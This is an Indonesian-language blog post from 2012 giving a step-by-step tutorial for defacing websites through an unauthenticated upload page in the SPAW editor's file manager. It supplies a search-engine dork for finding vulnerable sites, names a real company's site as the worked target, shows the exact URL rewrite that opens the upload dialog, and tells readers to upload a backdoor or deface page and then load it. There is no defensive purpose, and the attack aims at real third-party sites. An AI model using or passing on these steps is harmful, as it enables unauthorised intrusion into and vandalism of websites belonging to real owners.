Sunday, 13 May 2012

Deface Website With Spaw Upload

Unknown    No comments

Ane lagi jalan2 malem,eh nemu cara deface web dengan menggunakan kelemahan Spaw uploader..
sebelumnya maap ya omz om kalau repost n maap kalo tricknya udah jadul,maklum masih nubie belajar

langsung aja ,pertama kita cari dulu di paman ane dengan dork :


Code:
inurl:spaw2/uploads/files/

contoh ane pake target yang udah di dapet

Code:
http://punjlloyd.com/admin/spaw2/uploads/files/Corporate%20Identity/Stacked%20Punj%20Lloyd%20Logo/Logos/AI_Files/

kode yang
Code:
spaw2/uploads/files/Corporate%20Identity/Stacked%20Punj%20Lloyd%20Logo/Logos/AI_Files

ganti menjadi seperti di bawah ini

Code:
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

jadinya kaya gini nih omz

Code:
http://punjlloyd.com/admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

nanti bakalan keluar tuh tempat buat upload filenya..
tinggal di upload aja file/backdoor yang mau kita upload,nanti bakal keluar kaya gini

v
terakhir tinggal di panggil deh kaya gini

Code:
http://punjlloyd.com/admin/spaw2/uploads/files/ADa.html

sekali lagi maap ya kalo trik nya ketinggalan jaman.. piss

kalau boleh ane minta yang ijo2 nya ya omz om sekalian.. smangat

Socializer Widget By Blogger Yard
SOCIALIZE IT →
FOLLOW US →
SHARE IT →

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)

 

Copyright © 2013 Viscount.